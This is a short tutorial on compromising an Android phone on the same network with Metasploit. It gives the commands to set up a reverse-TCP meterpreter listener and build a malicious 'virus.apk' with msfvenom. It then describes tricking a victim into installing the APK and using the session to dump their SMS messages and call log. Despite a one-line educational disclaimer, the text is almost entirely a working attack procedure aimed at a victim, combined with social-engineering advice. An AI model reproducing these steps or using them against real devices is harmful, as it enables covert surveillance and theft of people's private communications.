Hack Android Mobile with Metasploit [Same Network]

Disclaimer: This tutorial is only for educational purpose. We are not responsible for any misuse of this tutorial.

Scenario: Victim uses android smart phone. Attackers needs the call log and SMS of the victim.


1. Metasploit

2. Linux/Windows [For demonstration I am using Ubuntu 14.04]

3. Social Engineering


1. Open terminal and type “sudo msfconsole”  1111

2. After few seconds metasploit will be loaded.


3. Type “use exploit/multi/handler

4. Type “set PAYLOAD android/meterpreter/reverse_tcp

5. Type “set LHOST” [LHOST=Attacker’s ip over network]

6. Type “exploit


7. After typing exploit we just create a listener which is waiting for an incoming connection.

8. Now let’s make a malicious apk file with metasploit by typing following command:

sudo msfvenom -p android/meterpreter/reverse_tcp LHOST= LPORT=4444 > virus.apk


9. You can find virus.apk file in your home folder.

Screenshot from 2015-08-30 15:34:57

10. Send this virus.apk file to victim’s phone and convince him to install it. Whenever victim installs that and opens the file, a remote connection will be made from victim’s IP to attackers IP on port 4444. Our metasploit listener will catch this connection and open a meterpreter session.


11. Type “sysinfo” to check the remote android system information.


12. Type “dump_sms” to dump all SMS of victim.


13. Type “dump_calllog” to dump the call history.


Conclusion: This will work on same network. Follow us for our next tutorial where we will show you show to use this exploit on a different network.